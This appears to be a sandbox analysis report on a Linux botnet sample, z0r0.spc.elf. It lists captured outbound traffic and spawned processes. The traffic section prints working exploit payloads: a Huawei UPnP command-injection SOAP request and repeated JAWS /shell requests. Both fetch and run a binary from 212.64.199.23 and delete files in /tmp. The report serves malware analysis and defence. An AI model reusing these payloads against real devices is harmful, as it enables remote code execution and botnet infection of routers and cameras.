                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          146192.168.2.1551524186.177.39.20080
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:22.734353065 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          147192.168.2.1544120179.210.59.21180
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:22.735373020 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          148192.168.2.1547236194.139.104.20380
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:22.736094952 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          149192.168.2.1558230219.172.14.2980
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:22.736653090 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          System Behavior

                                                          Start time (UTC):17:11:14
                                                          Start date (UTC):04/02/2025
                                                          Path:/tmp/z0r0.spc.elf
                                                          Arguments:/tmp/z0r0.spc.elf
                                                          File size:4379400 bytes
                                                          MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                                                          Start time (UTC):17:11:14
                                                          Start date (UTC):04/02/2025
                                                          Path:/tmp/z0r0.spc.elf
                                                          Arguments:-
                                                          File size:4379400 bytes
                                                          MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                                                          Start time (UTC):17:11:14
                                                          Start date (UTC):04/02/2025
                                                          Path:/tmp/z0r0.spc.elf
                                                          Arguments:-
                                                          File size:4379400 bytes
                                                          MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                                                          Start time (UTC):17:11:14
                                                          Start date (UTC):04/02/2025
                                                          Path:/tmp/z0r0.spc.elf
                                                          Arguments:-
                                                          File size:4379400 bytes
                                                          MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                                                          Start time (UTC):17:11:14
                                                          Start date (UTC):04/02/2025
                                                          Path:/tmp/z0r0.spc.elf
                                                          Arguments:-
                                                          File size:4379400 bytes
                                                          MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                                                          Start time (UTC):17:11:14
                                                          Start date (UTC):04/02/2025
                                                          Path:/tmp/z0r0.spc.elf
                                                          Arguments:-
                                                          File size:4379400 bytes
                                                          MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                                                          Start time (UTC):17:11:14
                                                          Start date (UTC):04/02/2025
                                                          Path:/tmp/z0r0.spc.elf
                                                          Arguments:-
                                                          File size:4379400 bytes
                                                          MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                                                          Start time (UTC):17:11:14
                                                          Start date (UTC):04/02/2025
                                                          Path:/usr/bin/xfce4-panel
                                                          Arguments:-
                                                          File size:375768 bytes
                                                          MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                          Start time (UTC):17:11:14
                                                          Start date (UTC):04/02/2025
                                                          Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                          Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
                                                          File size:35136 bytes
                                                          MD5 hash:ac0b8a906f359a8ae102244738682e76

                                                          Start time (UTC):17:11:14
                                                          Start date (UTC):04/02/2025
                                                          Path:/usr/bin/xfce4-panel
                                                          Arguments:-
                                                          File size:375768 bytes
                                                          MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                          Start time (UTC):17:11:14
                                                          Start date (UTC):04/02/2025
                                                          Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                          Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
                                                          File size:35136 bytes
                                                          MD5 hash:ac0b8a906f359a8ae102244738682e76

                                                          Start time (UTC):17:11:14
                                                          Start date (UTC):04/02/2025
                                                          Path:/usr/bin/xfce4-panel
                                                          Arguments:-
                                                          File size:375768 bytes
                                                          MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                          Start time (UTC):17:11:14
                                                          Start date (UTC):04/02/2025
                                                          Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                          Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
                                                          File size:35136 bytes
                                                          MD5 hash:ac0b8a906f359a8ae102244738682e76

                                                          Start time (UTC):17:11:14
                                                          Start date (UTC):04/02/2025
                                                          Path:/usr/bin/xfce4-panel
                                                          Arguments:-
                                                          File size:375768 bytes
                                                          MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                          Start time (UTC):17:11:14
                                                          Start date (UTC):04/02/2025
                                                          Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                          Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
                                                          File size:35136 bytes
                                                          MD5 hash:ac0b8a906f359a8ae102244738682e76

                                                          Start time (UTC):17:11:14
                                                          Start date (UTC):04/02/2025
                                                          Path:/usr/bin/xfce4-panel
                                                          Arguments:-
                                                          File size:375768 bytes
                                                          MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                          Start time (UTC):17:11:14
                                                          Start date (UTC):04/02/2025
                                                          Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                          Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
                                                          File size:35136 bytes
                                                          MD5 hash:ac0b8a906f359a8ae102244738682e76

                                                          Start time (UTC):17:11:14
                                                          Start date (UTC):04/02/2025
                                                          Path:/usr/bin/xfce4-panel
                                                          Arguments:-
                                                          File size:375768 bytes
                                                          MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                          Start time (UTC):17:11:14
                                                          Start date (UTC):04/02/2025
                                                          Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                          Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
                                                          File size:35136 bytes
                                                          MD5 hash:ac0b8a906f359a8ae102244738682e76